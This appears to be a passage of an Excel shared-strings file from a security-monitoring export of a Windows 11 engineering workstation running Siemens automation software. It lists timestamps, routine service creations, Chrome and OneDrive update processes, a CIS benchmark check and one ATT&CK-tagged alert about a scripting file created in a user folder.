    <t>May 9, 2025 @ 13:24:35.159</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:35.179</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:36.132</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:36.139</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:36.141</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:36.156</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:36.160</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:36.172</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:36.177</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:36.184</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:36.188</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:36.195</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:36.923</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\AarSvc_807bb\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k AarSvcGroup -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:36.924</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_807bb\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k BcastDVRUserService</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:36.925</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_807bb\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k BthAppGroup -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:36.926</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_807bb\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k ClipboardSvcGroup -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:36.927</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\CaptureService_807bb\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k LocalService -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:36.946</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_807bb\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:36.968</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\CloudBackupRestoreSvc_807bb\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:36.991</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_807bb\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k DevicesFlow</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:37.075</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_807bb\\ImagePath binary is: C:\\WINDOWS\\system32\\CredentialEnrollmentManager.exe</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:37.076</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_807bb\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k DevicesFlow -p</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_807bb\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k DevicesFlow</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:37.102</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_807bb\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k DevicesFlow</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:37.134</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\MessagingService_807bb\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:37.170</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\NPSMSvc_807bb\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k LocalService -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:37.198</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_807bb\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:37.308</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\P9RdrService_807bb\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k P9RdrService -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:37.310</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\PenService_807bb\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k PenService</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:37.316</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_807bb\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:37.328</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_807bb\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k PrintWorkflow</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:37.355</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\UdkUserSvc_807bb\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UdkSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:37.392</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_807bb\\ImagePath binary is: C:\\WINDOWS\\System32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:37.465</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_807bb\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:37.467</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\webthreatdefusersvc_807bb\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:37.490</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_807bb\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:37.550</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:37.579</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:37.631</t>
  </si>
  <si>
    <t>taskhostw.exe USER</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:37.634</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:37.639</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:37.642</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:37.659</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:37.675</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:38.329</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:38.332</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:38.334</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:38.337</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:38.709</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:38.711</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:39.772</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:39.942</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:39.952</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:39.957</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:39.960</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:39.965</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:39.967</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:39.970</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:39.972</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:39.975</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:39.978</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:41.459</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:41.460</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:41.462</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:41.465</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:42.541</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:42.609</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:42.615</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:42.619</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:42.622</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:43.693</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:43.706</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:43.710</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:43.736</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:45.300</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:45.479</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:45.493</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:45.502</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:45.508</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:45.532</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:45.533</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:46.137</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:46.292</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:47.056</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:47.083</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:47.099</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:47.118</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:48.114</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:48.157</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:48.204</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:48.236</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:48.269</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:48.322</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:48.336</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:48.350</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:48.364</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:48.397</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:48.427</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:48.455</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:48.459</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:48.460</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:48.461</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:48.474</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:48.475</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:48.489</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:48.533</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:49.227</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:49.245</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:49.282</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:49.305</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:50.848</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:50.851</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:53.873</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:54.748</t>
  </si>
  <si>
    <t>CIS Microsoft Windows 11 Enterprise Benchmark v3.0.0: Ensure 'Maximum password age' is set to '365 or fewer days, but not 0'.: Status changed from 'not applicable' to passed</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:55.969</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:55.973</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:59.057</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:03.598</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:03.772</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:07.278</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:07.279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</si>
  <si>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--field-trial-handle=2340,i,6060090785297826930,4527760222078284358,262144 --variations-seed-version --mojo-platform-channel-handle=4288 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:08.772</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:08.775</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:08.876</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:08.910</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:09.846</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:09.848</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:09.984</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:10.584</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:11.777</t>
  </si>
  <si>
    <t>/QuitInfo:00000000000009A0;00000000000009A4;</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:12.863</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:12.869</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:12.870</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:12.872</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:12.873</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:12.877</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:12.878</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:12.881</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:12.882</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:12.883</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:12.884</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:12.885</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:17.069</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:17.070</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:18.928</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:18.991</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:18.995</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:19.379</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:21.014</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:24.999</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:28.388</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:29.682</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:29.885</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:29.892</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:29.898</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:29.905</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:31.126</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:31.130</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:31.134</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:31.138</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:32.289</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:32.292</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:37.619</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:37.625</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:37.631</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:38.799</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:39.435</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:39.441</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:39.446</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:39.658</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:39.660</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:45.032</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:46.668</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:51.105</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:51.107</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:25:56.209</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:00.817</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:02.271</t>
  </si>
  <si>
    <t>\"C:\\Program Files\\WindowsApps\\Microsoft.YourPhone_1.25032.76.0_x64__8wekyb3d8bbwe\\PhoneExperienceHost.exe\" -ComServer:Background -Embedding</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:02.274</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:10.093</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:10.097</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:10.105</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:10.109</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:10.118</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:10.123</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:10.128</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:10.134</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:10.140</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:10.160</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:10.161</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:10.162</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:10.171</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:10.175</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:10.184</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:10.188</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:10.194</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:10.197</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:10.202</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:10.244</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:11.614</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:11.625</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:13.743</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:13.750</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:13.763</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:13.774</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:13.783</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:13.789</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:13.797</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:13.808</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:13.828</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:13.857</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:17.104</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:26.389</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:26.390</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:26.392</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:26.393</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:27.464</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:27.475</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:27.480</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:31.804</t>
  </si>
  <si>
    <t>\"C:\\Users\\Engineer\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:34.783</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:34.795</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:36.035</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:44.499</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:46.286</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:47.639</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:47.675</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:47.679</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:47.696</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:47.700</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:47.742</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:54.529</t>
  </si>
  <si>
    <t>\"C:\\Users\\Engineer\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\" /update /restart /updateSource:ODU</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:56.116</t>
  </si>
  <si>
    <t>C:\\Users\\Engineer\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe /update /restart /updateSource:ODU  /peruser  /childprocess  /extractFilesWithLessThreadCount  /renameReplaceOneDriveExe  /renameReplaceODSUExe  /removeNonCurrentVersions  /enableODSUReportingMode  /installWebView2  /SetPerProcessSystemDPIForceOffKey /EnableNucleusAutoStartFix /RegisterOneDriveLauncherAutoStartTask /EnableOneDriveLauncherRampDownloads</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:26:59.344</t>
  </si>
  <si>
    <t>WINDOWS11EWS\\Engineer</t>
  </si>
  <si>
    <t>Scripting file created under Windows Temp or User folder</t>
  </si>
  <si>
    <t>[T1059 T1105]</t>
  </si>
  <si>
    <t>[Execution, Command and Control]</t>
  </si>
  <si>
    <t>[Command and Scripting Interpreter, Ingress Tool Transfer]</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:01.645</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\SysWOW64\\runonce.exe /Run6432</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:03.352</t>
  </si>
  <si>
    <t>\"C:\\Program Files\\Siemens\\Automation\\UserManagement\\BIN\\UMTrayicon.exe\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:04.419</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Siemens\\Automation\\SCADA-RT_V11\\WinCC\\bin\\CCUCSurrogate.exe\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:05.914</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:05.920</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:05.928</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:05.932</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:05.949</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:05.954</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:05.963</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:05.970</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:05.983</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:05.984</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:05.994</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:05.999</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:06.012</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:06.063</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:06.097</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:06.917</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:07.291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</si>
  <si>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--field-trial-handle=2340,i,6060090785297826930,4527760222078284358,262144 --variations-seed-version --mojo-platform-channel-handle=4100 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:08.832</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:10.199</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:10.215</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:11.507</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\uus\\packages\\preview\\AMD64\\MoNotificationUx.exe /ClearActiveNotifications /CV Wqq2UYk5fUGinYqA.1.0.0</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:15.061</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:20.746</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:20.756</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:20.821</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:20.822</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:20.837</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:20.870</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:20.871</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:22.019</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:22.388</t>
  </si>
  <si>
    <t>\"C:\\Users\\Engineer\\AppData\\Local\\Microsoft\\OneDrive\\25.070.0413.0001\\FileSyncConfig.exe\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:23.476</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:23.484</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:23.492</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:24.257</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:24.783</t>
  </si>
  <si>
    <t xml:space="preserve"> /updateInstalled /background</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:27.670</t>
  </si>
  <si>
    <t>\"C:\\Users\\Engineer\\AppData\\Local\\Microsoft\\OneDrive\\25.070.0413.0001\\FileCoAuth.exe\" -Embedding</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:27.711</t>
  </si>
  <si>
    <t>/silentConfig</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:29.989</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:29.997</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:33.877</t>
  </si>
  <si>
    <t>\"C:\\Windows\\System32\\cmd.exe\" /q /c del /q \"C:\\Users\\Engineer\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:33.910</t>
  </si>
  <si>
    <t>\"C:\\Windows\\System32\\cmd.exe\" /q /c del /q \"C:\\Users\\Engineer\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:33.926</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:33.972</t>
  </si>
  <si>
    <t>\"C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_1.22.11141.0_x64__8wekyb3d8bbwe\\OpenConsole.exe\" -Embedding</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:33.988</t>
  </si>
  <si>
    <t>\"C:\\Program Files\\Siemens\\Automation\\TIAADMIN\\server\\modules\\soft\\native\\TiaAdminNotifier.exe\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:35.061</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:36.741</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:36.761</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:36.809</t>
  </si>
  <si>
    <t>\"C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_1.22.11141.0_x64__8wekyb3d8bbwe\\WindowsTerminal.exe\" -Embedding</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:27:40.505</t>
  </si>
  <si>
